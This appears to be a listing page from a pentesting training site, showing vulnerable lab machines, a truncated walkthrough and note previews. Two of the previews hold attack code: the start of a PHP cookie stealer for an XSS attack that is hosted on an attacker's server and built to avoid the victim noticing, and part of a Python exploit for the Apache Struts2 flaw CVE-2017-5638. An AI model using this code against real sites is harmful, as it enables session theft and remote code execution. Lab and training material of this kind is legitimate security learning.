Latest vulnerable machines- MrLeet

MrLeet provides vulnerables machines allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

Machine: Matrix_4

By: unknowndevice64 2022-12-05 08:56:27

MrLeet

Machine Details: Matrix is a medium+ level boot2root challenge Series of MATRIX Machines. The OVA has been tested on both VMware and Virtual Box.

Flags: Your Goal is to get root and read /root/flag.txt

Networkin...

Machine Size: 799
Machine OS: linux
Machine Level: intermediate

Score: 0

View details

Machine: Matrix_3

By: unknowndevice64 2019-07-09 12:50:59

MrLeet

Machine Details: Matrix is a medium level boot2root challenge Series of MATRIX Machines. The OVA has been tested on both VMware and Virtual Box.

Flags: Your Goal is to get root and read /root/flag.txt

Networking...

Machine Size: 554
Machine OS: linux
Machine Level: intermediate

Score: 0

View details

Machine: DC-6

By: dcau 2019-05-18 11:12:55

MrLeet

Machine Details: DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This isn't an overly difficult challenge so should be great for beginn...

Machine Size: 618
Machine OS: linux
Machine Level: intermediate

Score: 0

View details

Latest walkthrough of machines- MrLeet

MrLeet provides walkthrough of vulnerable machines allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

Walkthrough of: Matrix_1

By: unknowndevice64 2019-05-17 12:40:46

MrLeet

Discovery
First, we need to recognize the IP that the machine is using, I use arp-scan for the job but you can use netdiscover or nmap to do the trick, with arp-scan is like this:

arp-scan -l
This puts out a list of all the machines in the network that a re sending ARP packets, the output looks like this:

The IP of the machine identified
With that, we can proceed to do some footprinting u...

Score: 0

View Walkthrough

Latest notes for PenTesting- MrLeet

MrLeet provides useful notes from different hackers allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

Title: How Write an XSS Cookie Stealer in JavaScript to Steal Passwords

By: unknowndevice64 2019-11-08 22:57:46

// Upload/Save this file on ATTACKER_SERVER cookiestealer.php //
// change this google.com to same website, which you are attacking, so that Victim can't detect. //
// you can find cookie into same directory where you put this file, name log.txt //

<?php
header ('Location:https://google.com');

$cookies = $_GET["c&q...

Score: 0

View details

Title: HTTP Request Methods explained

By: unknowndevice64 2019-10-19 01:28:48

The two most common HTTP methods are: GET and POST.
What is HTTP?
The Hypertext Transfer Protocol (HTTP) is designed to enable communications between clients and servers.
HTTP works as a request-response protocol between a client and server.
A web browser may be the client, and an application on a computer that hosts a web site may be the serve...

Score: 0

View details

Title: CVE: 2017-5638 - Apache Struts2 S2-045

By: unknowndevice64 2019-10-08 22:35:20

#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import httplib
def exploit(url, cmd):
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload +...

Score: 0

View details